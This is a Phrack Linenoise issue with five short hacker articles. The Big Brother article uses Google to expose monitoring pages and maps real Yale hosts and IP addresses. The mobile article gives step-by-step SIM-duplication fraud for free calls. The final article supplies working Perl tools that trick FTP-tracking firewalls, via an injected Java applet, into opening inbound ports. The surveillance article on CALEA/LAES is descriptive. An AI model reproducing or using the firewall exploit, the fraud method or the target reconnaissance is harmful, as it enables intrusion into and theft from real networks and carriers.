==Phrack Inc.== Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10 |=-----------------------=[ L I N E N O I S E ]=-------------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ Phrack Staff ]=----------------------------=| --[ Contents 1 - The Dark Side of NTFS 2 - Watching Big Brother 3 - Free mobile calls 4 - Lawfully Authorized Electronic Surveillance [LAES] 5 - Java Tears down the Firewall --[ 1 - The Dark Side of NTFS Ok, this didnt fit anywhere else so we put it here: http://patriot.net/~carvdawg/docs/dark_side.html --[ 2 - Watching Big Brother by da_knight Have you ever wanted to be the one doing the watching? If you are a system administrator of UNIX / Linux servers, then you may be aware of a product called Big Brother, which can be downloaded from 'http://bb4.com/'. This article is by no means technical, simply because it doesn't need to be. It is divided into two sections, so bear with me for the briefing on Big Brother (BB). BB is a program that will monitor various computer equipment; things it can monitor are connectivity, cpu utilization, disk usage, ftp status, http status, pop3 status, etc. As you might imagine, this information is very important to an organization. BB is your standard client / server setup. The server software can run on various flavors of UNIX, Linux and NT. The client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and VAXEN; some client software is provided by 3rd-party vendors and not supported by BB4 Technologies. The cool thing about this is all of this information is viewed on a web page. So, if you have multiple servers that you have to maintain, with this product you would be able to go to one web page and quickly get a status of all of those servers - pretty handy. When everything is fine your status is "green", major problems are indicated by "red". Example: The connectivity (conn) status is done by pinging the equipment in question; if the ping fails then it would appear as a red zit on the web page. When tests such as this fail, BB can be configured to automatically page the administrator. Here is a quick run down of the statuses, listed in order of severity: red - Trouble; you've got problems. purple - No report; the client hasn't responded in the last 30 minutes. yellow - Attention; a threshold has been crossed. green - OK; take the day off. clear - Unavailable; the test has been turned off. blue - Disabled; notification for this test has been turned off. The status is also reflected in the title of the web page, so it only takes one red zit to cause the web page title to start with "red:Big Brother"; we're going to get into this in a minute. A common thing for administrators to do is to monitor their most important systems with this product, as well as the most important aspects of each system. If you have a web server, you would want to monitor the http and conn statuses just to make sure people are still able to connect to the server. Other tests I have seen are to check Oracle, or to list all connected users. Hell, they even have a way to add weather reports. The point is, it's pretty limitless what can be monitored, it just depends on what you deem important. Now that you have a little bit of an understanding what BB can do, I want to quote two things from BB4 Technologies (BB4) FAQ - Section 5: Security Considerations (http://bb4.com/bb/help/bb-faq.html#5.0). Everything in that section of the FAQ should be considered, but we'll focus on these two. "BB does not need to run as root. We suggest creating a user 'bb' and running bb as that user." "We recommend password-protecting the Big Brother web pages" So, you ask yourself, why are these things important to me? Well, one, you know that administrators who run this software probably have it setup using the user 'bb', and that they may also be running it with root level access. This gives you a valid user account on a system and this account probably wouldn't be used by a human very often so the password could be something simple. But that's not the point of this article. The second thing is that BB4 realizes the information on these web pages is extremely important and they recommend password-protecting them. Following this logic you then say these are web pages, so it's running on a web server and if they're not password-protected and the server is visible to the WWW, then...that's right search engines will find these pages and serve them up when you know what to look for. What are you waiting for? Go to 'http://www.google.com' and search for "green:Big Brother" (include the quotes; it makes it more refined). You will get about 16,200 matches. Now that doesn't mean that those are all unique because it will have numerous pages from the same site, but you get the point. I would estimate that there are over 200 sites that can be viewed this way. Remember to search for all the other statuses too, just change the name of the color. One more thing, I chose Google for a reason. Some of these sites no longer run the BB product, but Google has a nice ability to view cached pages, so you can still glean information from them. After you scroll through the list of sites you will realize that the majority of them are either small ISP's or colleges. I'm going to pick on a college, an Ivy League one, no less. I can tell you from looking at this particular BB site that the BB server is running on a computer called 'artemis.cs.yale.edu' and the IP address is '128.36.232.57'. Also the computer 'rhino.zoo.cs.yale.edu' is having some serious issues. How did I find the IP address? Simple; if you click on the "green" or whatever color button under the "conn" column, you will see a web page that has information similar to this: --------------------------------------------------------- rhino.zoo.cs.yale.edu - conn --------------------------------------------------------- green Sun Jun 30 01:33:15 EDT 2002 Connection OK PING 128.36.232.12 (128.36.232.12) from 128.36.232.57 : 56(84) bytes of data. 64 bytes from 128.36.232.12: icmp_seq=0 ttl=255 time=379 usec --- 128.36.232.12 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms --------------------------------------------------------- Right there you know that the ping command was trying to ping '128.36.232.12', in this case, 'rhino.zoo.cs.yale.edu' and that it came from '128.36.232.57' or 'artemis.cs.yale.edu'. Let's see what else we can find out. I can see that almost all of their servers run Tripwire, so they are UNIX systems, and you probably would have a hard time creating a backdoor account on these systems. On another page, we get to see the users who are currently logged in. Currently we have 33 users logged in, and seeing as it's 1:33 AM, I think some people left their computers logged in. I want to get more information about Yale's servers, so let's go back to Google and look for another page from Yale, but this time look for 'zelda.cs.yale.edu'. Now we can get some good information. When this site is displayed you will see quite a few servers, listed as well as several departments. If you want to know what software 'plucky.cs.yale.edu' is using to run it's HTTP services just click on the 'green' button: ---------------------------------------------------- plucky.cs.yale.edu - http ---------------------------------------------------- green Sun Jun 30 01:45:21 EDT 2002 http://plucky.cs.yale.edu - Server OK HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://plucky.cs.yale.edu/index.html Date: Sun, 30 Jun 2002 05:45:21 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag: "54b4ec126d3ebe1:4051" Content-Length: 2226 Seconds: 0.01 ---------------------------------------------------- What the hell? They're actually running IIS 4.0? Don't they know how insecure that is? But I digress. From that information you know that the server is some version of Windows NT and it has IIS 4.0 running, that could be handy. Zelda is also showing they monitor printers. Now that can be fun; what if the message "I think therefore I hack!" is sent to the printer 'philo-printer.philosophy.yale.edu'? And in case you're wondering, the printer is an 'HP LaserJet 4050 Series'; I just had to click on the button under the "printer" column to find that out. Elsewhere on this same site, I find that several servers are running TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly tell you what version of the software they are running. Oracle, for instance, is even nice enough to show you all of the connected users. How can you thank them enough for this valuable information? Also, it seems only the geologists at Yale feel they have data that is of great importance. I wasn't able to view what they monitor because of access permissions on their web site, but I do know that they are running their web server on Apache version 1.3.26. As you can see, I would be able to gather an enormous amount of vital infrastructure data in a few minutes. Plus, I didn't break any laws. These web pages are posted in a manner that the entire world can view them. It might take someone 10 minutes or more to find out a few facts about 1 particular system, but in that amount of time I found numerous facts about over 40 systems at the same organization. Thanks Big Brother! I feel it should be mentioned that the information found on these web pages is information that most organizations don't even let employees outside of the IT department see. I guess I should feel special since Yale must feel that I'm not a security risk, otherwise they would have made me authenticate to their web sites. Imagine this; an ISP that lists all of their routers complete with IP's and model information. If you had that, you could possibly rely on vulnerabilities in SNMP discovered earlier this year, or better yet, rely on the default accounts / passwords setup on these types of devices. I only bring this up because I know I did come across an ISP that did list routers and the majority of the sites returned by Google seemed to be smaller ISPs. Also, about searching on Google, I would recommend searching for "red:Big Brother", because these pages will always give you more information than when the system is running perfectly. Finally, I didn't write this article to condone breaking into systems and providing a means to that end. I wrote this because security is extremely important; with the information that is found because of this one product your environment could be compromised. If you are a system administrator for a site that shows up on Google you may want to secure your BB web pages, because by the time you read this the world is going to know your infrastructure. --[ 3 - Free Mobile Calls by eurinomo This bug can be utilized to make FREE CALS, FREE SMS, and even FREE WAP. 1st you have to see if you mobile network has the bug. Just call the service free number (to don't waste money) and say to them that you card is locked that you forgot your fone in your litle syster's room and your mobile says "Sim Card is lock" or something, say that maybe yor sister have wronged the puk because the phone was powered off and now it's on. Then the guy must say that you have to go to one of theyr Mobile Shops and say the problem and they will give you another card with the same number and money as the old. Ask them how much it will cost and the guy must say it's for free! :-) Now the Matirial that youl need: - A mobile phone not nokia (it's better to be yours and not unlocked) - And a nokia(can be a unlocked 1 or steled or borrowed. Do as you wish!) How to do it: Mobile1 = Not nokia Mobile2 = Nokia Put the card in the mobile1 and enter your pin. When it booted up put this code 3 times: **04*00000000*00000000*00000000# or try **05*00000000*00000000*00000000# Check the manual and search for the code to change the puk if the above examples dont work. Or give a email to motorola and say that you have a motorola phone and that you want to change the puk and you know that is a code to change (the code isn't ilegal and it's also specified in the manual). If the code isnt the one that i have telled is 1 nerby. If you have a motorola flare when you put **04* or **05* it'ill say "Enter the old Puk" or something like that automatly and then ask the new puk code 2 times. But the important is to lock your card, i think you can do it also if you wrong the pin 3 times and then enter a wrong puk and vuala it's locked! But what i was saing about the code it's was tested but you can try this last too, use it in your on risk. Now goto the Mobile Shop and say what hapened (that your litle sister or a doughter of an friend of your mother or something like that...) And then they will dupicate the card and they will give you the new one and the old one. At last they normaly give the 2. Now the easy part. Put the old card in the nokia and boot it up and you see thats not locked!!! and if you put on anoher phone not nokia its says that its locked, the Bug is a more nokia Bug that a network Bug. Now send a SMS with the old card and see if disconted money. Then see if was disconted from the new card if not than it's because the Network has the bug and you can waste the money off the old card as you wish but you only have 2 weeks or soo before they cut it out of the Network and it's completly lock, but the new card stil have the same money and you can do it again and again that i think they woldn't catch you. This was tested in the Portugal Vodafone Mobile Phone Network. --[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES) by Mystic In 1994 Congress adopted the Communications Assistance for Law Enforcement Act (CALEA). It's intent was to preserve but not expand the wiretapping capabilities of law enforcement agencies by requiring telecommunication providers to utilize systems that would allow government agencies a basic level of access for the purpose of surveillance. The act however does not only preserve the already existing capabilities of law enforcement to tap communications, it enhances them, allowing the government to collect information about wireless callers, tap wireless content, text messing, and packet communications. The standard that resulted from this legislation is called Lawfully Authorized Electronic Surveillance or LAES. A Telecommunications Service Provider (TSP) that is CALEA compliant provides means to access the fallowing services and information to Law Enforcement Agencies (LEAs): 1. Non-call associated: Information about the intercept subjects that is not necessarily related to a call. 2. Call associated: call-identifying information about calls involving the intercept subjects. 3. Call associated and Non-call associated signaling information: Signaling information initiated by the subject or the network 4. Content surveillance: the ability to monitor the subjects' communications. This process is called the intercept function. The intercept function is made up of 5 separate functions: access, delivery, collection, service provider administration, and law enforcement administration. ----[ 4.1 The Access Function (AF) The AF consists of one or more Intercept Access Points (IAPs) that isolate the subject's communications or call-identifying information unobtrusively. There are several different IAPs that can be utilized in the intercept function. I have separated them into Call Associated and Non-call Associated information IAPs and Content Surveillance IAPs: Call Associated and Non-call Associated information IAPs -------------------------------------------------------- - Serving System IAP (SSIAP): gives non-call associated information. - Call-Identifying Information IAP (IDIAP): gives call associated information and in the form of the fallowing call events for basic circuit calls: Answer - A party has answered a call attempt Change - The identity or identities of a call has changed Origination - The system has routed a call dialed by the subject or the system has translated a number for the subject Redirection - A call has been redirected (e.g., forwarded, diverted, or deflected) Release - The facilities for the entire call have been released TerminationAttempt - A call attempt to an intercept subject has been detected - Intercept Subject Signaling IAP (ISSIAP): provides access to subject-initiated dialing and signaling information. This includes if the intercept subject uses call forwarding, call waiting, call hold, or three-way calling. It also gives the LEA the ability to receive the digits dialed by the subject. - Network Signaling IAP (NSIAP): Allows the LEA to be informed about network messages that are sent to the intercept subject. These messages include busy, reorder, ringing, alerting, message waiting tone or visual indication, call waiting, calling or redirection name/number information, and displayed text. Content Surveillance IAPs ------------------------- The fallowing are content surveillance IAPs that transmit content using a CCC or CDC. An interesting note about content surveillance is that TSPs are not responsible for decrypting information that is encrypted by the intercept subject unless the data was encrypted by the TSP and the TSP has the means to decrypt it. - Circuit IAP (CIAP): accesses call content of circuit-mode communications. - Conference Circuit IAP (CCIAP): Provides access to the content of subject-initiated Conference Call services such as three-way calling and multi-way calling. - Packet Data IAP (PDIAP): Provides access to data packets sent or received by the intercept subject. These include the fallowing services: ISDN user-to-user signaling ISND D-channel X.25 packet services Short Message Services (SMS) for cellular and Personal Communication Services Wireless packet-mode data services (e.g., Cellular Digital Packet Data (CDPD), CDMA, TDMA, PCS1900, or GSM-based packet-mode data services) X.25 services TCP/IP services Paging (one-way or two-way) Packet-mode data services using traffic channels ----[ 4.2 The Delivery Function (DF) The DF is responsible for delivering intercepted communications to one or more Collection Functions. This is done over two distinct types of channels: Call Content Channels (CCCs) and Call Data Channels (CDCs). The CCCs are generally used to transport call content such as voice or data communications. CCCs are either "combined" meaning that they carry transmit and receive paths on the same channel, or "separated" meaning that transmit and receive paths are carried on separate channels. The CDCs are generally used to transport messages which report which is text based such as Short Message Service (SMS). Information over CDCs is transmitted using a protocol called the Lawfully Authorized Electronic Surveillance Protocol (LAESP). ----[ 4.3 The Collection Function (CF) The CF is responsible for collecting and analyzing intercepted communications and call-identifying information and is the responsibility of the LEA. ----[ 4.4 The Service Provider Administration Function (SPAF) The SPAF is responsible for controlling the TSP's Access and Delivery Functions. ----[ 4.5 The Law Enforcement Administration Function (LEAF) The LEAF is responsible for controlling the LEA's Collection Function and is the responsibility of the LEA. Now that I've introduced you to LAES lets look at an implementation of it that is on the market right now and is being used by some TSPs: Overview of the CALEAserver: The CALEAserver is manufactured by SS8 Networks. It is a collection and delivery system for call information and content. It allows existing networks to become completely CALEA compliant. It allows for a LEA to monitor wireless and wire line communications and gather information about the calls remotely. The CALEAserver interfaces with the network through Signaling System 7 (SS7) which is an extension of the Public Switched Telephone Network (PSTN). The CALEAserver is composed of three major layers: the Hardware Platform Layer, the Network Platform Layer and the Application Software Layer. The Hardware Platform Layer consists of the Switching Matrix and the Computing Platform. The Switching Matrix is an industry standard programmable switch. It contains T1 cards for voice transmission and cross connect between switches, DSP cards for the conference circuits required for the intercept and DTMF reception/generation, and CPU cards for management of the switch. The Computing Platform is a simplex, rack mounted, UNIX based machine. It is used to run the CALEAserver application software that provides Delivery Function capabilities and controls the Switching Matrix. The Network Platform Layer provides SS7 capability, as well as, call processing APIs for the Application Software Layer. It also controls the Switching Matrix. The Application Software Layer is where the Delivery and Service Provider Administration functions are carried out. It isolates the interfaces towards the Access and Collection Functions from the main delivery functionality allowing for multiple Access and Collection Functions through the Interface Modules that can be added or modified without impacting the existing functionality. System Capacity: Configurable for up to: 1000 Collection functions 128 Access Function Interfaces 32 SS7 links 512 simultaneous call content intercepts on a single call basis 64 T1 voice facilities Operating Environment: NEBS compliant, -48 volt, 19" rack mounted equipment Next-generation UltraSPARC processor 66-MHz PCIbus Solaris UNIX operating system 9Gbyte, 40-MB/sec SCSI disks 512 Mbytes RAM standard Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT Two RS-232C/RS-423 serial ports Programmable, scalable switch with up to 4000 port time slot interchange Features: Built in test tools for remote testing Full SS7 management system Alarm reporting and Error logging Automatic software fault recovery Automatic or manual disk backup SNMP support Optional support for X.25 and other collection function interfaces ITU standard MML and Java based GUI support Support of both circuit-switched and packet-switched networks Optional support for other access function interfaces as required for CALEA compliance, including: *HLR (Home Location Register) *VMS (Voice Mail System) *SMS (Short Message System) *CDPD wireless data *Authentication Center *Remote access provisioning This concludes the introduction to LAES. This being only an introduction, I've left out allot of details like protocol information. However, if you are interested it learning more about LAES I would suggest reading the TIA standard J-STD-025A. I hope you learned a little bit more about the surveillance capabilities of LEAs. If you have any questions feel free to contact me. Email address: see above. --[ 5 - Java tears down the Firewall Recently there has been much hype about various insecurities in firewalls which support tracking of FTP sessions. They could be tricked into thinking someone was opening an FTP session by using a second TCP stack for example. I would point you to CERT-URL for complete discussion. There have been other techniques discussed such as embedding some evil tags in HTML files which makes the browser opening connections a firewall could interpret as FTP session. Consider the following net: [ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ] Someone from 'Company' is browsing the web and has to pass his packets across some router that is not under control by Company but by attacker. Very common scenario no? A few tools have been compiled to circumvent such setup. I would even say, as soon as you enable FTP tracking you are lost. More than one way ends in Rome. Let me explain the small tools in short. html-redirect: Attacker installs this on some router and sets up redirect rule to port 8888. class-inject: Attacker starts this with eftepe.class. html-redirect will redirect the HTML requests to this mini-httpd. It forces browser inside Company which is shielded by firewall to load the Java applet. This applet simulates active FTP session to some router and it is allowed so because security manager sees some router as origin of eftepe.class. Firewall will then open port 7350 inbound so you can connect from some router:20 to Company:7350. ftpd: Attacker must run this on some router in order to simulate FTP session. createclass: script to create the correct java code which is using apropriate IP (of some router) and port (on Company) then Attacker could also sit on WEB (i.e. phrack.org :) and embed evil java applets. So take care because X runs on port 6000. :-) It is really that simple, and its not even worth an own article, thats why you find it here as a add-on. #!/usr/bin/perl -w # Puts a classfile into remote browser # use IO::Socket; sub usage { print "Usage: $0 \n\n"; exit; } my $classfile = shift || usage(); my $class; my $classlen = (stat($classfile))[7]; open I, "<$classfile" or die $!; read I, $class, $classlen; close I; my $sock = new IO::Socket::INET->new(Listen => 10, LocalPort => 8080, Reuse => 1) or die $!; my $conn; for (;;) { next unless $conn = $sock->accept(); if (fork() > 0) { $conn->close(); next; } my $request = <$conn>; if ($request =~ /$classfile/) { my $classcontent = "HTTP/1.0 200 OK\r\n". "Server: Apache/1.3.6 (Unix)\r\n". "Content-Length: $classlen\r\n". "Content-Type: application/octet-stream\r\n\r\n".$class; print $conn $classcontent; print "Injected to ", $conn->peerhost(), "\n"; } else { print $conn "". "". "\r\n\r\n"; } $conn->close(); exit(0); } #!/usr/bin/perl -w $ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin"; print "Creating apropriate Java class-file for opeing port > 1023\n"; print "Enter IP to connect to on port 21 (e.g. '127.0.0.1'):"; my $ip = ; chop($ip); print "Enter port to open:"; my $port = ; chop($port); my $p1 = int $port/256; my $p2 = $port%256; open O, ">eftepe.java" or die $!; print O< #!/usr/bin/perl -w use IO::Socket; my $sock = new IO::Socket::INET->new(Listen => 10, LocalPort => 21, Reuse => 1) or die $!; my $conn; for (;;) { $conn = $sock->accept(); if (fork() > 0) { $conn->close(); next; } print $conn "220 ready\r\n"; <$conn>; # user print $conn "331 Password please\r\n"; <$conn>; # pass print $conn "230 Login successful\r\n"; <$conn>; #port print $conn "200 PORT command successful.\r\n"; sleep(36); $conn->close(); exit 0; } #!/usr/bin/perl -w # Simple HTTP Redirector # # iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888 use IO::Socket; sub usage { print "Usage: $0 \n". "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n"; exit; } my $r = shift || usage(); my $redir = "HTTP/1.0 301 Moved Permanently\r\n". "Location: http://$r:8080\r\n\r\n"; my $sock = new IO::Socket::INET->new(Listen => 10, LocalPort => 8888, Reuse => 1) or die $!; my $conn; for (;;) { next unless $conn = $sock->accept(); if (fork() > 0) { $conn->close(); next; } my $request = <$conn>; print $conn "$redir"; $conn->close(); exit(0); } #!/usr/bin/perl -w use IO::Socket; sub usage { print "Usage: $0 \r\n"; exit 0; } my $a = shift || usage(); my $b = shift || usage(); my $conn = IO::Socket::INET->new(PeerAddr => $a, PeerPort => $b, LocalPort => 20, Type => SOCK_STREAM, Proto => 'tcp') or die $!; print $conn "GOTCHA\r\n"; $conn->close(); #!/bin/sh # sample FTP session tracked firewall for 2.4 linux kernels # modprobe ip_conntrack_ftp iptables -F iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT #iptables -A INPUT -p tcp --syn -j LOG iptables -A INPUT -p tcp --syn -j DROP |=[ EOF ]=---------------------------------------------------------------=|